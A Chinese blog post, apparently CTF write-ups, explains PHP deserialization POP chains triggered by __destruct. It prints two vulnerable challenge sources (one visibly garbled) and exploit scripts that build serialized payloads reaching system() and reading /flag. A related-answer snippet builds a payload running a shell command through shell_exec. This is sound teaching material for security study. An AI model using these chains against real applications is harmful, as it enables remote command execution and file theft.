PHP POP链小结,梳理一下__destruct魔术方法

最新推荐文章于 2023-06-08 22:22:21 发布
最新推荐文章于 2023-06-08 22:22:21 发布
阅读量734 收藏 6
点赞数
分类专栏: CTF 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73606240/article/details/128735156
版权

前置知识: 

        1.魔术方法:PHP之十六个魔术方法详解(总结)-php教程-PHP中文网

        2.适合做POP链起点的魔术方法:__destruct、__wakeup

        3.私有属性和保护属性的初始化方法,在类中定义__construct魔术方法,实例化对象时传入需要初始化的内容即可。

<?php
class BBB {
    protected $name;
    public function __construct($name){
        $this->name=$name;
    }
}
$a=new BBB('bob');
var_dump ($a);
//object(BBB)#1 (1) {
//  ["name":protected]=>
//  string(3) "bob"
//}
?>

        4.在较新版本的php中,一个类中若要调用一个类的方法需要声明"(new XXX())->xxx()", 低版本则是XXX::xxx,X为类名,x为方法名。

        5.涉及私有属性和保护属性需urlencode序列化内容。

实例

        1.2023.1.10三校联合内部训练赛web ezPOP

<?php
highlight_file(_FILE_):
error_reporting(O):
class AAA {
	private $cmd;
	public function _destruct()
	{
		echo "This is cmd :".$this->cmd;
	}
	public function _invoke()
	{
		system($this->cmd);
	}
}
class BBB {
	protected $name;
	public function _toString()
	{
		return $this -> name ->obj;
	}
}
class EEE{
	public $var;
	public function _get($var){
	{	
		($this->var)();
	}
unserialize($_POST['pop'];

        wrtiteup:

        pop链讲解的文章有很多,具体链条的形成不多讲解,这里就重点演示一下__destruct魔术方法的触发和实例化对象的初始化,首先链条是:AAA(__destruct)->BBB(__toString)->EEE(_get)->AAA(__invoke),exp如下:

<?php
class AAA {
    private $cmd;
    public function __construct($cmd){
        $this->cmd=$cmd;
    }
}

class BBB {
    protected $name;
    public function __construct($name){
        $this->name=$name;
    }
}

class EEE {
    public $var;
    public function __construct($var){
        $this->var=$var;
    }
}
echo urlencode(serialize(new AAA(new BBB(new EEE(new AAA("ls"))))));

        当序列化的内容被反序列化时,由于unserialize($_POST['pop'];为程序结尾的位置,所以会调用__destruct魔术方法,触发pop链。

        2.三校联赛web MoreFast

<?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function backdoor($key){
        if($key == "GoodJob"){
            readfile("/flag");
        }else{
            die("Bad Job!");
        }
    }
}
class SQLi{
    public $func;
    public $var;
    public function hello(){
        echo "You Touch Me";
    }
    public function bye(){
        $fun = $this->func;
        $fun($this->var);
    }
}

class Test{
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
}

class Reader{
    public $name;
    public $obj;
    public function __destruct(){
        if(!preg_match("/CTF/i",$this->name)){
            echo "NoNoNo";
        }else{
            system("whoami");
        }
    }
    public function bye(){
        echo "Let's say goodbye with a smile";
    }
    public function __call($func,$var){
        if($func == "hello"){
            $this->obj->bye();
        }
    }
}

class Lua{
    public $hard;
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __toString(){
        ($this->hard)();
        return "Bad times make a good man.";
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

class Json{
    public $format;
    public function __invoke(){
        $this->format->hello();
    }
    public function __construct(){
        $this->format = array();
    }
}

if(isset($_GET['exp'])){
    $o = unserialize($_GET['exp']);
    throw new Exception("So Easy!");
}

         writeup:

这里重点讲__destruct魔术方法的触发和跨类调用方法,首先pop链是:Reader(__destruct)->Lua(__toString)->Json(__invoke)->Reader(__call)->SQli(bye())->Evil(backdoor()),exp如下:

<?php
class SQLi{
    public $func;
    public $var;
}
class Reader{
    public $name;
    public $obj;
}

class Lua{
    public $hard;
}

class Json{
    public $format;
}

$a = new Reader;
$a -> name = new Lua;
$a -> name -> hard = new Json;
$a -> name -> hard -> format = new Reader;
$a -> name -> hard -> format -> obj = new SQLi;
// 解法一:静态调用backdoor方法
$a -> name -> hard -> format -> obj -> var = "GoodJob";
$a -> name -> hard -> format -> obj -> func = "(new Evil())->backdoor()";
// 解法二:动态调用函数读文件
//$a -> name -> hard -> format -> obj -> var = "/flag";
//$a -> name -> hard -> format -> obj -> func = "readfile";
echo serialize($a);

        注意到在SQLi中调用Evil的backdoor的声明 func = "(new Evil())->backdoor()" ,区别高低版本的不同。另外,序列化的内容被反序列化后 $o = unserialize($_GET['exp']);执行结束后。即函数结束,函数中的参数类被销毁,此时触发__destruct,启动pop链。另外还可以调用readfile函数。

 

QMDD
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php中__destruct与register_shutdown_function执行的先后顺序问题
10-25
主要介绍了php中__destruct与register_shutdown_function执行的先后顺序问题,需要的朋友可以参考下
php使用get_class_methods()函数获取分类的方法
10-21
请注意,`get_class_methods()` 不会返回对象的魔术方法,例如 `__construct()`、`__destruct()` 等。如果你需要获取包括魔术方法在内的所有方法,可以考虑使用 `ReflectionClass`。 总结一下,`get_class_methods...
php魔术方法call,PHP中的11个魔术方法总结:__construct,、__destruct、__call等
weixin_35548251的博客
03-10 194
搜索热词PHP中的魔术方法总结 :__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__set_state,__clone and __autoload1、__get、__set这两个方法是为在类和他们的父类中没有声明的属性而设计的__get( $pr...
PHP反序列化pop的构造
Elite的博客
03-28 833
简单易懂的反序列化pop构造
第三届陕西省大学生网络安全技能大赛wp
最新发布
leekos的博客,分享web安全相关知识~
06-08 542
本质上,fast destruct 是因为unserialize过程中扫描器发现序列化字符串格式有误导致的提前异常退出,为了销毁之前建立的对象内存空间,会立刻调用对象的。突破点在dark类的getFlag方法,里面有个include可以文件包含,可以使用php伪协议绕过hacked函数。直接使用反射即可,注意:由于属性是private,所以我们需要。因为这里抛出了一个异常,导致destruct方法没有被触发,试了一下,发现 小数点 / 等东西都被过滤了,可以使用。提示我们需要使用这些方法,结合。
php构析方法,PHP析构方法 __destruct( )
weixin_34892992的博客
03-10 364
与构造方法相对的就是析构方法。析构方法是PHP5新添加的内容,在PHP4中没有析构方法。析构方法是在对象被销毁之前自动调用的方法,主要执行一些特定的操作,例如关闭文件,释放结果集等与构造方法类似,一个类的析构方法名称必须是两个下划线 __destruct( )。析构函数不能带有任何参数...
魔术方法(一)__construct,__destruct
hrbsfdxzhq01的博客
03-28 1195
通常以__(两个下划线)开始,并且不需要显示的调用而是由某种特定的条件触发,具有某些特殊的功能和要求,新版本15个魔术方法。 一、构造函数 1、__construct() 触发机制:使用关键字new实例化对象时会自动调用构造方法 参数:个数不限 作用:完成一些对象的初始化工作。常用的比如实现数据库自动连接。 将构造函数声明为私有方法,可以防止在类外部创建对象,这在单例模式中经常...
PHP魔术方法使用方法汇总
12-19
魔术方法PHP面向对象中特有的特性。它们在特定的情况下被触发,都是以双下划线开头,你可以把它们理解为钩子,利用模式方法可以轻松实现PHP面向对象中重载(Overloading即动态创建类属性和方法)。魔术方法很多...
php常见的魔术方法详解
12-18
PHP中的魔术方法有 :__construct, __destruct , __call, __callStatic,__get, __set, __isset, __unset , __sleep, __wakeup, __toString, __set_state, __clone, __autoload  1、__get、__set  这两个方法是为在...
PHP中的魔术方法总结和使用实例
01-20
魔术方法PHP面向对象中特有的特性。它们在特定的情况下被触发,都是以双下划线开头,你可以把它们理解为钩子,利用模式方法可以轻松实现PHP面向对象中重载(Overloading即动态创建类属性和方法)。魔术方法很多...
PHP中的魔术方法详解
@日月空@的博客
09-27 552
原文地址 PHP中有一类特别的系统方法,它们统一以__开头,使用语义清晰简单,这类形式特殊、作用特殊的方法被称为魔术方法。 常见的魔术方法有: __construct()、__destruct() __call()、__callStatic() __get()、__set() __isset()、__unset() __sleep()、__wakeup() __toString()、__invoke()、__clone()、__set_state()、__debugInfo() 这些魔术方法往往是成对出现
PHP基础知识点【十一】魔术方法
Tacks的博客
03-31 329
PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以双下划线前缀。这些魔术方法使用的时候不需要用户自己去调用,而是在特定的情况下会被自动调用。 【1】__construct()与__destruct() PHP中允行开发者在一个类中定义一个方法作为构造方法。具有构造方法的类会在每次创建新对象时先调用此方法,所以非常适...
php析构函数使用,php析构函数__destruct()使用方法及实例讲解
weixin_39634194的博客
03-09 352
通过上一篇文章《php 构造函数__construct()使用分析》的讲解,我们已经知道了什么叫构造方法。那么与构造方法对应的就是析构方法。析构方法允许在销毁一个类之前执行的一些操作或完成一些功能,比如说关闭文件、释放结果集等。析构方法是PHP5才引进的新内容。析造方法的声明格式与构造方法__construct()比较类似,也是以两个下划线开始的方法__destruct(),这种析构方法名...
UnserializeOne
qq_64201116的博客
10-09 1241
_set() 用于将数据写入不可访问的属性 给一个未定义的属性赋值时,此方法会被触发,传递的参数是被设置的属性名和值 // 不存在赋值。__set_state(),调用var_export()导出类时,此静态方法会被调用。__isset(),当对不可访问属性调用isset()或empty()时调用。__isset() 在不可访问的属性上调用isset()或empty()触发。__unset(),当对不可访问属性调用unset()时被调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
php析构函数的关键字,PHP __destruct():析构函数/方法
weixin_42502933的博客
03-16 234
前面我们介绍了 PHP 的构造函数《__construct()》,它可以在对象被创建时自动调用。在 PHP5 中还提供了一个与之相对应的函数——析构函数。析构函数的作用和构造函数正好相反,析构函数只有在对象被垃圾收集器收集前(即对象从内存中删除之前)才会被自动调用。析构函数允许我们在销毁一个对象之前执行一些特定的操作,例如关闭文件、释放结果集等。在 PHP 中有一种垃圾回收机制,当对象不能被访问时...
[校赛] - Web - ezPop
1tachi的博客
12-03 1802
终于做出校赛级别的题了,好难 这是一个简单的pop构造,难就难在他有五个类,一个干扰类,剩下四个可以有三种以上做法
php反序列化漏洞之pop
weixin_60719780的博客
02-08 1837
常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与
day45 PHP反序列化&POP构造&魔术方法&原生类
wanjia01的博客
01-17 880
知识点:1、什么是反序列化操作?-格式转换2、为什么会出现安全漏洞?-魔术方法3、反序列化漏洞如何发现?-对象逻辑4、反序列化漏洞如何利用?-POP构造补充:反序列化利用大概分类三类-魔术方法的调用逻辑-如触发条件-语言原生类的调用逻辑-如SoapClient-语言自身的安全缺陷-如CVE-2016-7124#反序列化课程点:序列化:对象转换为数组或字符串等格式反序列化:将数组或字符串等格式转换成对象serialize()//将一个对象转换成一个字符串。
php魔术方法使用,PHP魔术方法使用
weixin_42577243的博客
03-17 127
支持魔术方法class MyClass{public function __construct() {}public function __destruct() {}public function __call() {}public function __callStatic() {}public function __get() {}public function __set() {}publi...
请帮我构造这段代码的pop <?php highlight_file(__FILE__); class home{ private $args; function __construct($args){ $this->args=$args; } function __destruct() { echo shell_exec($this->args); } } $a=$_GET['a']; unserialize($a);
05-05
首先需要了解的是,构造 pop 需要满足两个条件: 1. 对象的构造函数需要接收参数,且该参数可以被我们控制。 2. 对象的析构函数中需要存在一些恶意代码,比如执行系统命令等。 在给定的代码中,我们可以看到构造函数 `__construct` 接收参数 `$args`,并将其保存到了 `$this->args` 中。因此,我们可以通过传入恶意参数来控制 `$this->args` 的值。 此外,析构函数 `__destruct` 中存在一个 `shell_exec` 函数调用,可以用来执行系统命令。因此,我们可以将恶意代码写在 `$this->args` 中,让 `__destruct` 函数执行我们的命令。 综上,我们的目标是构造一个恶意参数,使得反序列化时会调用 `__construct` 函数,将我们的恶意参数保存到 `$this->args` 中。接着,在对象被销毁时,`__destruct` 函数会执行我们的系统命令。 下面是一个例子,其中我们将 `touch /tmp/success` 命令作为恶意代码: ```php <?php class home{ private $args; function __construct($args){ $this->args=$args; } function __destruct(){ echo shell_exec($this->args); } } // 构造 payload $obj1 = new home("touch /tmp/success"); $payload = urlencode(serialize($obj1)); // 构造 pop ,将 $obj1 引用传递给 $obj2 $obj2 = new home($payload); echo urlencode(serialize($obj2)) . "\n"; ``` 输出结果: ``` O%3A4%3A%22home%22%3A1%3A%7Bs%3A4%3A%22args%22%3Bs%3A18%3A%22touch+%2Ftmp%2Fsuccess%22%3B%7D ``` 将该 payload 传递给目标程序反序列化即可触发 pop ,执行恶意命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QMDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值